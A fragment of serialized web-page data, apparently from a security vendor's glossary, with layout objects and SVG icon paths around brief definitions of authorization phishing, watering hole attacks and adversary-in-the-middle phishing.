"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":19437},{"path":21,"query":19438},{},{"kind":20},[],{"tag":19442},{"@type":105,"id":18635,"model":17052,"value":19443},{"name":18637,"createdDate":18638,"modelId":17056,"data":19444,"meta":19453,"lastUpdated":18651,"id":18635,"query":19454,"published":13,"firstPublished":18653,"rev":18654},{"title":18637,"name":18637,"url":18640,"blocks":19445,"state":19450},[19446],{"id":18643,"@type":44,"tagName":73,"properties":19447,"responsiveStyles":19448},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":19449},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":19451},{"path":21,"query":19452},{},{"kind":20},[],{"tag":19456},{"@type":105,"id":18858,"model":17052,"value":19457},{"name":18860,"createdDate":18861,"modelId":17056,"data":19458,"meta":19467,"lastUpdated":18874,"id":18858,"query":19468,"published":13,"firstPublished":18876,"rev":18877},{"title":18860,"name":18860,"url":18863,"blocks":19459,"state":19464},[19460],{"id":18866,"@type":44,"tagName":73,"properties":19461,"responsiveStyles":19462},{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":19463},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},{"deviceSize":83,"location":19465},{"path":21,"query":19466},{},{"kind":20},[],"Authorization phishing is an umbrella term for phishing attacks that target authorization flows rather than credentials — tricking users into granting access instead of revealing passwords. Covers OAuth consent phishing, device code phishing, and ConsentFix-style prompts. Because the user authorizes the attacker through a legitimate flow, no credentials are stolen and MFA is never challenged.","Also known as: authorization-based phishing \u002F auth flow abuse","regular:faUserCheck",{"deviceSize":83,"location":19473},{"path":21,"query":19474},{},"Authorization phishing","c9aa4e5633d64fd39fd600f1e9abfba2",1790585478840,{"breakpoints":19479,"hasAutosaves":6,"hasErrors":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},1790177425644,[],[],{},{"createdBy":32,"createdDate":19485,"data":19486,"folders":19501,"id":19502,"lastUpdateSource":60,"lastUpdated":19503,"lastUpdatedBy":478,"meta":19504,"modelId":17142,"name":19500,"published":13,"query":19506,"stageModifiedSincePublish":6,"testRatio":31,"variations":19507,"firstPublished":19508,"rev":17145},1789988193245,{"attackTechniques":19487,"browserIdentityAttacksMatrix":19497,"description":19498,"icon":19499,"title":19500,"visibleOnPage":19},[19488],{"attacks":19489},{"@type":105,"id":468,"model":452,"value":19490},{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19491,"data":19492,"variations":19493,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":19494,"meta":19495,"rev":17392},[],{"name":474,"url":257},{},[],{"lastPreviewUrl":21,"kind":20,"breakpoints":19496,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],"Watering hole attacks are a targeted variant of website compromise where attackers deliberately infect sites frequented by a specific organization or industry group (trade publications, supplier portals, industry forums). When someone from the target visits the infected site, their browser executes malicious code — often a zero-day exploit — without warning signs. Distinguished by patience and precision: attackers research their targets, identify trusted destinations, and wait.","regular:faDroplet","Watering hole attacks",[],"cc74d6bb8c70427f9ea272ba89069ba4",1790585531426,{"breakpoints":19505,"hasAutosaves":19,"hasErrors":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},[],{},1789988229208,{"createdBy":32,"createdDate":19510,"data":19511,"folders":19535,"id":19536,"lastUpdateSource":60,"lastUpdated":19537,"lastUpdatedBy":478,"meta":19538,"modelId":17142,"name":455,"published":13,"query":19540,"stageModifiedSincePublish":6,"testRatio":31,"variations":19541,"firstPublished":19542,"rev":17145},1789988024066,{"attackTechniques":19512,"browserIdentityAttacksMatrix":19522,"description":19532,"hint":19533,"icon":19534,"title":455},[19513],{"attacks":19514},{"@type":105,"id":451,"model":452,"value":19515},{"createdDate":454,"id":451,"name":455,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":19516,"data":19517,"variations":19518,"lastUpdated":460,"firstPublished":461,"testRatio":31,"createdBy":32,"lastUpdatedBy":32,"folders":19519,"lastUpdateSource":60,"meta":19520,"rev":17604},[],{"name":455,"url":252},{},[],{"breakpoints":19521,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[19523],{"tag":19524},{"@type":105,"id":17075,"model":17052,"value":19525},{"createdDate":17077,"id":17075,"name":17078,"modelId":17056,"published":13,"meta":19526,"stageModifiedSincePublish":6,"query":19528,"data":19529,"variations":19530,"lastUpdated":17085,"firstPublished":17086,"testRatio":31,"createdBy":32,"folders":19531,"lastUpdateSource":60,"lastUpdatedBy":478,"rev":17088},{"breakpoints":19527,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":17078,"url":17083},{},[],"Adversary-in-the-Middle (AiTM) is a type of phishing attack that uses a reverse proxy to sit between the victim and a legitimate login page, relaying credentials and session tokens in real time. Bypasses MFA because the attacker captures the authenticated session cookie, not just the password.","Also known as: MFA bypass phishing \u002F reverse proxy phishing \u002F session phishing \u002F transparent proxy phishing","regular:faMask",[],"86a6c861bbcc469fa5a388d49a5615a9",1790585473130,{"breakpoints":19539,"hasAutosaves":19,"hasErrors":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},[],{},1789988080254,{"w":380,"h":380,"d":19544},"M208 176c0-70.7 57.3-128 128-128s128 57.3 128 128-57.3 128-128 128c-10.4 0-20.5-1.2-30.1-3.6-8.1-2-16.7 .5-22.6 6.4L254.1 336 200 336c-13.3 0-24 10.7-24 24l0 40-40 0c-13.3 0-24 10.7-24 24l0 40-64 0 0-78.1 157.2-157.2c5.9-5.9 8.3-14.5 6.4-22.6-2.3-9.6-3.6-19.7-3.6-30.1zM336 0c-97.2 0-176 78.8-176 176 0 9.5 .7 18.8 2.2 27.9L7 359c-4.5 4.5-7 10.6-7 17L0 488c0 13.3 10.7 24 24 24l112 0c13.3 0 24-10.7 24-24l0-40 40 0c13.3 0 24-10.7 24-24l0-40 40 0c6.4 0 12.5-2.5 17-7l27.2-27.2c9.1 1.4 18.4 2.2 27.9 2.2 97.2 0 176-78.8 176-176S433.2 0 336 0zm32 176a32 32 0 1 0 0-64 32 32 0 1 0 0 64z",{"w":17,"h":380,"d":19546},"M304.3 304c97.2 0 176 78.8 176 176l0 8c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-8c0-70.7-57.3-128-128-128l-96 0c-70.7 0-128 57.3-128 128l0 8c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-8c0-97.2 78.8-176 176-176l96 0zM585.7 105.9c7.8-10.7 22.8-13.1 33.5-5.3s13.1 22.8 5.3 33.5L522.1 274.9c-4.2 5.7-10.7 9.4-17.7 9.8s-14-2.2-18.9-7.3l-46.4-48c-9.2-9.5-9-24.7 .6-33.9 9.5-9.2 24.7-8.9 33.9 .6l26.5 27.4 85.6-117.7zM256.3 256a128 128 0 1 1 0-256 128 128 0 1 1 0 256zm0-208a80 80 0 1 0 0 160 80 80 0 1 0 0-160z",{"w":379,"h":380,"d":19548},"M102.4 4.8c-7.3-5.5-17-6.3-25.1-2.3S64 14.9 64 24l0 400c0 10.3 6.6 19.5 16.4 22.8s20.6-.1 26.8-8.4l96.7-129 94.6 189.3c5.9 11.9 20.3 16.7 32.2 10.7s16.7-20.3 10.7-32.2l-94.7-189.3 161.2 0c10.3 0 19.5-6.6 22.8-16.4s-.1-20.6-8.4-26.8L102.4 4.8zM112 352l0-280 224 168-128 0c-7.6 0-14.7 3.6-19.2 9.6L112 352z",{"w":379,"h":380,"d":19550},"M248 24c0-13.3-10.7-24-24-24s-24 10.7-24 24l0 246.1-63-63c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9L207 345c9.4 9.4 24.6 9.4 33.9 0L345 241c9.4-9.4 9.4-24.6 0-33.9s-24.6-9.4-33.9 0l-63 63 0-246.1zM66.2 272L64 272c-35.3 0-64 28.7-64 64l0 80c0 35.3 28.7 64 64 64l320 0c35.3 0 64-28.7 64-64l0-80c0-35.3-28.7-64-64-64l-2.2 0-48 48 50.2 0c8.8 0 16 7.2 16 16l0 80c0 8.8-7.2 16-16 16L64 432c-8.8 0-16-7.2-16-16l0-80c0-8.8 7.2-16 16-16l50.2 0-48-48zM368 376a24 24 0 1 0 -48 0 24 24 0 1 0 48 0z",{"w":380,"h":380,"d":19552},"M201.1 57.3c-7 5.3-9.1 10.7-9.1 14.7 0 4.2 2.4 10.1 10.4 15.6 7.8 5.3 13.6 14.6 13.6 25.6 0 17-13.8 30.7-30.7 30.7L56 144c-4.4 0-8 3.6-8 8l0 52.5c7.4-2.9 15.5-4.5 24-4.5 43.1 0 72 39.4 72 80s-28.9 80-72 80c-8.5 0-16.6-1.6-24-4.5L48 456c0 4.4 3.6 8 8 8l100.5 0c-2.9-7.4-4.5-15.5-4.5-24 0-43.1 39.4-72 80-72s80 28.9 80 72c0 8.5-1.6 16.6-4.5 24l52.5 0c4.4 0 8-3.6 8-8l0-129.3c0-17 13.8-30.7 30.7-30.7 11.1 0 20.3 5.8 25.6 13.6 5.5 8 11.4 10.4 15.6 10.4 4 0 9.5-2.1 14.7-9.1s9.3-17.9 9.3-30.9-4-23.8-9.3-30.9-10.7-9.1-14.7-9.1c-4.2 0-10.1 2.4-15.6 10.4-5.3 7.8-14.6 13.6-25.6 13.6-17 0-30.7-13.8-30.7-30.7l0-81.3c0-4.4-3.6-8-8-8l-81.3 0c-17 0-30.7-13.8-30.7-30.7 0-11.1 5.8-20.3 13.6-25.6 8-5.5 10.4-11.4 10.4-15.6 0-4-2.1-9.5-9.1-14.7S245 48 232 48 208.2 52 201.1 57.3zM172.3 18.9C188.5 6.8 209.6 0 232 0S275.5 6.8 291.7 18.9 320 49.5 320 72c0 8.6-1.8 16.7-4.9 24L360 96c30.9 0 56 25.1 56 56l0 44.9c7.3-3.1 15.4-4.9 24-4.9 22.5 0 41 12.2 53.1 28.3s18.9 37.3 18.9 59.7-6.8 43.5-18.9 59.7-30.6 28.3-53.1 28.3c-8.6 0-16.7-1.8-24-4.9l0 92.9c0 30.9-25.1 56-56 56l-78.1 0c-18.7 0-33.9-15.2-33.9-33.9 0-10.1 4.5-18.5 9.9-24.2 4.2-4.3 6.1-9.2 6.1-13.9 0-9.9-10.7-24-32-24s-32 14.1-32 24c0 4.7 1.9 9.5 6.1 13.9 5.5 5.7 9.9 14.1 9.9 24.2 0 18.7-15.2 33.9-33.9 33.9L56 512c-30.9 0-56-25.1-56-56L0 329.9c0-18.7 15.2-33.9 33.9-33.9 10.1 0 18.5 4.5 24.2 9.9 4.3 4.2 9.2 6.1 13.9 6.1 9.9 0 24-10.7 24-32s-14.1-32-24-32c-4.7 0-9.5 1.9-13.9 6.1-5.7 5.5-14.1 9.9-24.2 9.9-18.7 0-33.9-15.2-33.9-33.9L0 152c0-30.9 25.1-56 56-56l92.9 0c-3.1-7.3-4.9-15.4-4.9-24 0-22.5 12.2-41 28.3-53.1z",{"w":380,"h":380,"d":19554},"M367 41l63 63-406.1 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l406.1 0-63 63c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0L505 145c9.4-9.4 9.4-24.6 0-33.9L401 7c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9zM145 297c9.4-9.4 9.4-24.6 0-33.9s-24.6-9.4-33.9 0L7 367c-9.4 9.4-9.4 24.6 0 33.9L111 505c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-63-63 406.1 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-406.1 0 63-63z",{"w":395,"h":380,"d":19556},"M91.4 162.3c-30.3 26.2-43.4 62.9-43.4 109.7 0 43.9 15.3 74.8 36.8 95 22 20.6 53.7 33 91.2 33l8.4 0c6.1 0 11.6-3.4 14.3-8.8l23.2-46.3 0 0C234.4 319.8 260 304 288 304s53.6 15.8 66.1 40.8l23.2 46.3c2.7 5.4 8.2 8.8 14.3 8.8l8.4 0c37.4 0 69.2-12.4 91.2-33 21.5-20.2 36.8-51.1 36.8-95 0-46.8-13-83.5-43.4-109.7-31.7-27.4-90.4-50.3-196.6-50.3S123.1 134.9 91.4 162.3zM0 272C0 160 64 64 288 64s288 96 288 208-80 176-176 176l-8.4 0c-24.2 0-46.4-13.7-57.2-35.4l-23.2-46.3c-4.4-8.8-13.4-14.3-23.2-14.3s-18.8 5.5-23.2 14.3l-23.2 46.3c-10.8 21.7-33 35.4-57.2 35.4l-8.4 0C80 448 0 384 0 272zm96-16a64 64 0 1 1 128 0 64 64 0 1 1 -128 0zm320-64a64 64 0 1 1 0 128 64 64 0 1 1 0-128z",{"w":380,"h":380,"d":19558},"M7 239c-9.4 9.4-9.4 24.6 0 33.9L175 441c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9L81.9 280 488 280c13.3 0 24-10.7 24-24s-10.7-24-24-24L81.9 232 209 105c9.4-9.4 9.4-24.6 0-33.9s-24.6-9.4-33.9 0L7 239z",{"w":380,"h":380,"d":19560},"M505 273c9.4-9.4 9.4-24.6 0-33.9L337 71c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9l127 127-406.1 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l406.1 0-127 127c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0L505 273z",{"w":380,"h":380,"d":19562},"M24 72C10.7 72 0 82.7 0 96s10.7 24 24 24l91.7 0c10.2 32.5 40.5 56 76.3 56s66.1-23.5 76.3-56L488 120c13.3 0 24-10.7 24-24s-10.7-24-24-24L268.3 72C258.1 39.5 227.8 16 192 16s-66.1 23.5-76.3 56L24 72zm0 160c-13.3 0-24 10.7-24 24s10.7 24 24 24l251.7 0c10.2 32.5 40.5 56 76.3 56s66.1-23.5 76.3-56l59.7 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-59.7 0c-10.2-32.5-40.5-56-76.3-56s-66.1 23.5-76.3 56L24 232zm0 160c-13.3 0-24 10.7-24 24s10.7 24 24 24l59.7 0c10.2 32.5 40.5 56 76.3 56s66.1-23.5 76.3-56L488 440c13.3 0 24-10.7 24-24s-10.7-24-24-24l-251.7 0c-10.2-32.5-40.5-56-76.3-56s-66.1 23.5-76.3 56L24 392zm136 56a32 32 0 1 1 0-64 32 32 0 1 1 0 64zM352 288a32 32 0 1 1 0-64 32 32 0 1 1 0 64zM160 96a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z",{"w":395,"h":380,"d":19564},"M391.5 53.2c-4.5 1.7-7.5 6-7.5 10.8s3 9.1 7.5 10.8L448 96 469.2 152.5c1.7 4.5 6 7.5 10.8 7.5s9.1-3 10.8-7.5L512 96 568.5 74.8c4.5-1.7 7.5-6 7.5-10.8s-3-9.1-7.5-10.8L512 32 490.8-24.5c-1.7-4.5-6-7.5-10.8-7.5s-9.1 3-10.8 7.5L448 32 391.5 53.2zM167.9 208.5l24.1-52.1 24.1 52.1c4.8 10.4 13.1 18.7 23.5 23.5l52.1 24.1-52.1 24.1c-10.4 4.8-18.7 13.1-23.5 23.5l-24.1 52.1-24.1-52.1c-4.8-10.4-13.1-18.7-23.5-23.5L92.3 256 144.5 231.9c10.4-4.8 18.7-13.1 23.5-23.5zM165.6 99.1l-41.2 89.3-89.3 41.2-.6 .3c-3.9 1.8-12.3 5.7-25.2 11.6-5.7 2.6-9.3 8.3-9.3 14.5s3.6 11.9 9.3 14.5c12.9 5.9 21.2 9.8 25.2 11.6l.6 .3 89.3 41.2 41.2 89.3 .3 .6c1.8 3.9 5.7 12.3 11.6 25.2 2.6 5.7 8.3 9.3 14.5 9.3s11.9-3.6 14.5-9.3c14.4-31.1 15.1-32.7 53.1-115l89.3-41.2 .6-.3c3.9-1.8 12.3-5.7 25.2-11.6 5.7-2.6 9.3-8.3 9.3-14.5s-3.6-11.9-9.3-14.5c-31.1-14.4-32.7-15.1-115-53.1l-41.2-89.3-.3-.6c-1.8-3.9-5.7-12.3-11.6-25.2-2.6-5.7-8.3-9.3-14.5-9.3s-11.9 3.6-14.5 9.3c-13.8 29.8-11.5 25-11.9 25.8zM416 416l-56.5 21.2c-4.5 1.7-7.5 6-7.5 10.8s3 9.1 7.5 10.8L416 480 437.2 536.5c1.7 4.5 6 7.5 10.8 7.5s9.1-3 10.8-7.5L480 480 536.5 458.8c4.5-1.7 7.5-6 7.5-10.8s-3-9.1-7.5-10.8L480 416 458.8 359.5c-1.7-4.5-6-7.5-10.8-7.5s-9.1 3-10.8 7.5L416 416z",{"w":380,"h":380,"d":19566},"M112.6 41.4C72.8 79.3 48 132.7 48 192 48 205.3 37.3 216 24 216S0 205.3 0 192C0 119.1 30.5 53.2 79.4 6.6 89-2.5 104.2-2.2 113.4 7.4s8.8 24.8-.8 33.9zm320-34.8c48.9 46.6 79.4 112.4 79.4 185.4 0 13.3-10.7 24-24 24s-24-10.7-24-24c0-59.3-24.8-112.7-64.6-150.6-9.6-9.1-10-24.3-.8-33.9s24.3-10 33.9-.8zM232 24c0-13.3 10.7-24 24-24s24 10.7 24 24l0 9.7C361.4 45.3 424 115.4 424 200l0 14.5c0 37.7 10 74.7 29 107.3l21.9 37.5c3.4 5.8 5.1 12.3 5.1 19 0 20.9-16.9 37.8-37.8 37.8L69.8 416c-20.9 0-37.8-16.9-37.8-37.8 0-6.7 1.8-13.3 5.1-19L59 321.7c19-32.6 29-69.6 29-107.3L88 200c0-84.6 62.6-154.7 144-166.3l0-9.7zM411.5 345.9C388.3 306 376 260.6 376 214.5l0-14.5c0-66.3-53.7-120-120-120S136 133.7 136 200l0 14.5c0 46.2-12.3 91.5-35.5 131.4l-12.9 22.1 336.9 0-12.9-22.1zM256 512c-31.3 0-58-20-67.9-48l135.8 0c-9.9 28-36.6 48-67.9 48z",{"w":380,"h":380,"d":19568},"M288 464L64 464c-8.8 0-16-7.2-16-16l0-224c0-8.8 7.2-16 16-16l48 0 0-48-48 0c-35.3 0-64 28.7-64 64L0 448c0 35.3 28.7 64 64 64l224 0c35.3 0 64-28.7 64-64l0-48-48 0 0 48c0 8.8-7.2 16-16 16zM224 304c-8.8 0-16-7.2-16-16l0-224c0-8.8 7.2-16 16-16l224 0c8.8 0 16 7.2 16 16l0 224c0 8.8-7.2 16-16 16l-224 0zm-64-16c0 35.3 28.7 64 64 64l224 0c35.3 0 64-28.7 64-64l0-224c0-35.3-28.7-64-64-64L224 0c-35.3 0-64 28.7-64 64l0 224z",{"w":380,"h":380,"d":19570},"M505.5 41c9.4-9.4 9.4-24.6 0-33.9s-24.6-9.4-33.9 0l-103 103 0-54.1c0-13.3-10.7-24-24-24s-24 10.7-24 24l0 112c0 13.3 10.7 24 24 24l112 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-54.1 0 103-103zm-323.4-.1c-11.9-26.2-41.6-39.1-68.9-30-62.3 20.8-116.2 83.7-102.6 160.9 30.6 173.7 156.5 299.6 330.2 330.2 77.2 13.6 140.1-40.4 160.9-102.6 9.1-27.3-3.9-57-30-68.9l-87.3-39.7c-23.4-10.6-51-4-67.1 16L296 333.3c-48.9-27.3-88.9-68.8-114.4-118.8l24.2-19.3c20.1-16.1 26.7-43.7 16-67.1L182.1 40.9zM128.4 56.4c4-1.3 8.3 .6 10 4.4L178.1 148c1.5 3.4 .6 7.4-2.3 9.7l-38.9 31.1c-8.4 6.8-11.3 18.3-7 28.2 31.9 73.9 89.9 133.8 162.4 168.2 10.1 4.8 22.1 2 29-6.7l33.5-41.9c2.3-2.9 6.3-3.9 9.7-2.3l87.3 39.7c3.8 1.7 5.7 6 4.4 10-15.1 45.3-58.6 79.1-107 70.5-153.8-27.1-264.1-137.4-291.2-291.3-8.5-48.4 25.3-91.9 70.5-107z",{"w":380,"h":380,"d":19572},"M48 384l0-128 416 0 0 128c0 8.8-7.2 16-16 16L64 400c-8.8 0-16-7.2-16-16zM64 64C28.7 64 0 92.7 0 128L0 384c0 35.3 28.7 64 64 64l384 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 64zm32 64a32 32 0 1 1 0 64 32 32 0 1 1 0-64zm64 32a32 32 0 1 1 64 0 32 32 0 1 1 -64 0zm128-32a32 32 0 1 1 0 64 32 32 0 1 1 0-64z",{"w":380,"h":380,"d":19574},"M259.4 48.7L430.8 128 259.4 207.2c-2.1 1-4.6 1-6.7 0L81.2 128 252.6 48.7c2.1-1 4.6-1 6.7 0zM279.5 5.2c-14.9-6.9-32.1-6.9-47 0L13.9 106.2C5.4 110.1 0 118.6 0 128s5.4 17.9 13.9 21.8l218.6 101c14.9 6.9 32.1 6.9 47 0l218.6-101c8.5-3.9 13.9-12.4 13.9-21.8s-5.4-17.9-13.9-21.8L279.5 5.2zM48.1 218.4L13.9 234.2C5.4 238.1 0 246.6 0 256s5.4 17.9 13.9 21.8l218.6 101c14.9 6.9 32.1 6.9 47 0l218.6-101c8.5-3.9 13.9-12.4 13.9-21.8s-5.4-17.9-13.9-21.8l-34.1-15.8-57.2 26.4 24.1 11.1-171.4 79.2c-2.1 1-4.6 1-6.7 0L81.2 256 105.3 244.9 48.1 218.4zM13.9 362.2C5.4 366.1 0 374.6 0 384s5.4 17.9 13.9 21.8l218.6 101c14.9 6.9 32.1 6.9 47 0l218.6-101c8.5-3.9 13.9-12.4 13.9-21.8s-5.4-17.9-13.9-21.8l-34.1-15.8-57.2 26.4 24.1 11.1-171.4 79.2c-2.1 1-4.6 1-6.7 0l-171.4-79.2 24.1-11.1-57.2-26.4-34.1 15.8z",{"w":398,"h":380,"d":19576},"M232 96l-80 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l80 0c13.3 0 24 10.7 24 24s-10.7 24-24 24zm0 48c37.1 0 67.6-28 71.6-64L320 80c8.8 0 16 7.2 16 16l0 352c0 8.8-7.2 16-16 16L64 464c-8.8 0-16-7.2-16-16L48 96c0-8.8 7.2-16 16-16l16.4 0c4 36 34.5 64 71.6 64l80 0zM291.9 32C279 12.7 257 0 232 0L152 0c-25 0-47 12.7-59.9 32L64 32C28.7 32 0 60.7 0 96L0 448c0 35.3 28.7 64 64 64l256 0c35.3 0 64-28.7 64-64l0-352c0-35.3-28.7-64-64-64l-28.1 0z",{"w":380,"h":380,"d":19578},"M303.2 413c-21.5 43.7-41.4 51-47.2 51s-25.7-7.3-47.2-51c-17-34.5-29.2-81.6-32.1-133l158.6 0c-3 51.5-15.2 98.6-32.1 133zm32.1-181l-158.6 0c3-51.5 15.2-98.6 32.1-133 21.5-43.7 41.4-51 47.2-51s25.7 7.3 47.2 51c17 34.5 29.2 81.6 32.1 133zm48.1 48l79.2 0c-8.6 74.6-56.7 137.3-122.8 166.4 24-42.8 40.3-102.4 43.6-166.4zm79.2-48l-79.2 0c-3.3-64-19.6-123.6-43.6-166.4 66.1 29.2 114.2 91.8 122.8 166.4zm-334 0l-79.2 0c8.6-74.6 56.7-137.3 122.8-166.4-24 42.8-40.3 102.4-43.6 166.4zM49.4 280l79.2 0c3.3 64 19.6 123.6 43.6 166.4-66.1-29.2-114.2-91.8-122.8-166.4zM256 512a256 256 0 1 0 0-512 256 256 0 1 0 0 512z",{"w":395,"h":380,"d":19580},"M41-25C31.6-34.3 16.4-34.3 7-25S-2.3-.4 7 9L535 537c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-46.7-46.7c32.5-23.2 53.8-61.3 53.8-104.3 0-49.9-28.5-93-70.1-114.2 4-11.9 6.1-24.6 6.1-37.8 0-66.3-53.7-120-120-120-11.5 0-22.7 1.6-33.3 4.7-29.3-32.3-71.6-52.7-118.7-52.7-39.6 0-75.9 14.4-103.8 38.2L41-25zM170.3 104.3c19.1-15.2 43.4-24.3 69.7-24.3 37.7 0 71 18.6 91.3 47.1 6.7 9.5 19.3 12.8 29.8 7.8 9.3-4.4 19.7-6.9 30.8-6.9 39.8 0 72 32.2 72 72 0 14.1-4 27.2-11 38.3-4.1 6.5-4.8 14.6-2 21.7s9 12.5 16.5 14.3c34.8 8.7 60.5 40.2 60.5 77.6 0 29.8-16.3 55.8-40.5 69.6L170.3 104.3zM362.2 432L144 432c-53 0-96-43-96-96 0-42.7 27.9-79 66.6-91.4 11.8-3.8 18.8-16 16.1-28.1-1.3-6-2.2-12.2-2.5-18.5L84.5 154.3c-2.9 12.1-4.5 24.7-4.5 37.7 0 4.9 .2 9.8 .7 14.6-47.8 23.4-80.7 72.5-80.7 129.4 0 79.5 64.5 144 144 144l266.2 0-48-48z",{"w":17,"h":380,"d":19582},"M598.1 75.4c10.7-7.8 13.1-22.8 5.3-33.5s-22.8-13.1-33.5-5.3l-74.5 54.2-9.9-6.6C465.8 71 442.6 64 418.9 64l-59.2 0-.4 0-143.6 0c-26.7 0-52.5 8.9-73.4 25.1L70.1 36.6c-10.7-7.8-25.7-5.4-33.5 5.3s-5.4 25.7 5.3 33.5l88 64c9.6 6.9 22.7 5.9 31.1-2.4l3.9-3.9c13.5-13.5 31.8-21.1 50.9-21.1l46.3 0-91.7 91.7c-15.6 15.6-15.6 40.9 0 56.6l.8 .8C218 308 294 308 340.9 261.1l27.1-27.1 97.8 97.8c15.6 15.6 15.6 40.9 0 56.6l-9.8 9.8-31-31c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9l28 28c-17.5 10.4-37.2 16.7-57.6 18.5L313 399c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9l15 15-3.8 0c-36.1 0-70.7-14.3-96.2-39.8L65 279c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9L160.2 442.1c34.5 34.5 81.3 53.9 130.1 53.9l51.8 0 1 1 1-1 5.7 0c48.8 0 95.6-19.4 130.1-53.9l19.9-19.9c1.2-1.2 2.3-2.3 3.4-3.5 .7-.5 1.3-1.1 1.9-1.7L609 313c9.4-9.4 9.4-24.6 0-33.9s-24.6-9.4-33.9 0l-53.8 53.8c-4.2-12.8-11.3-24.9-21.5-35.1L385 183c-9.4-9.4-24.6-9.4-33.9 0l-44.1 44.1c-26.5 26.5-68.5 28-96.7 4.6l98.7-98.7c13.4-13.4 31.6-21 50.6-21.1l8.5 0 .2 0 50.8 0c14.2 0 28.1 4.2 39.9 12.1L482.7 140c8.4 5.6 19.3 5.3 27.4-.6l88-64z",{"w":398,"h":380,"d":19584},"M247.5 58c7.7-10.8 5.3-25.8-5.5-33.5s-25.8-5.3-33.5 5.5L93 191 45 143c-9.4-9.4-24.6-9.4-33.9 0S1.7 167.6 11 177l68 68c5 5 11.9 7.5 18.9 6.9s13.4-4.2 17.5-9.9l132-184zm130 134c7.7-10.8 5.3-25.8-5.5-33.5s-25.8-5.3-33.5 5.5L157 417 75 335c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9L143 471c5 5 11.9 7.5 18.9 7s13.4-4.2 17.5-9.9l198-276z",{"w":380,"h":380,"d":19586},"M256.5 0c14.7 0 28.2 8.1 35.2 21l216 400c6.7 12.4 6.4 27.4-.8 39.5S486.6 480 472.5 480l-432 0c-14.1 0-27.1-7.4-34.3-19.5s-7.5-27.1-.8-39.5l216-400c7-12.9 20.5-21 35.2-21zM53.9 432L459.1 432 256.5 56.8 53.9 432zm202.6-40a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm0-208c18.6 0 33 16.1 31 34.6l-7.1 64.1C279 294.8 268.7 304 256.5 304s-22.5-9.2-23.8-21.3l-7.1-64.1c-2-18.5 12.4-34.6 31-34.6z",{"w":380,"h":380,"d":19588},"M209 409L345 273c9.4-9.4 9.4-24.6 0-33.9L209 103c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9l95 95-246.1 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l246.1 0-95 95c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0zM344 80l72 0c26.5 0 48 21.5 48 48l0 256c0 26.5-21.5 48-48 48l-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l72 0c53 0 96-43 96-96l0-256c0-53-43-96-96-96l-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24z",{"w":379,"h":380,"d":19590},"M304 48a96 96 0 1 1 0 192 96 96 0 1 1 0-192zm0 240c79.5 0 144-64.5 144-144S383.5 0 304 0 160 64.5 160 144c0 31.1 9.9 59.9 26.6 83.4L7 407c-9.4 9.4-9.4 24.6 0 33.9l64 64c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-47-47 30.1-30.1 47 47c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-47-47 98.6-98.6C244.1 278.1 272.9 288 304 288z",{"w":380,"h":380,"d":19592},"M425 31l80 80c9.4 9.4 9.4 24.6 0 33.9l-80 80c-9.4 9.4-24.6 9.4-33.9 0s-9.4-24.6 0-33.9l39-39-74.1 0c-15.1 0-29.3 7.1-38.4 19.2l-33.6 44.8-30-40 25.2-33.6C297.3 118.2 325.8 104 356 104l74.1 0-39-39c-9.4-9.4-9.4-24.6 0-33.9s24.6-9.4 33.9 0zM194 336l-25.2 33.6C150.7 393.8 122.2 408 92 408l-68 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l68 0c15.1 0 29.3-7.1 38.4-19.2L164 296 194 336zm197-49c9.4-9.4 24.6-9.4 33.9 0l80 80c9.4 9.4 9.4 24.6 0 33.9l-80 80c-9.4 9.4-24.6 9.4-33.9 0s-9.4-24.6 0-33.9l39-39-74.1 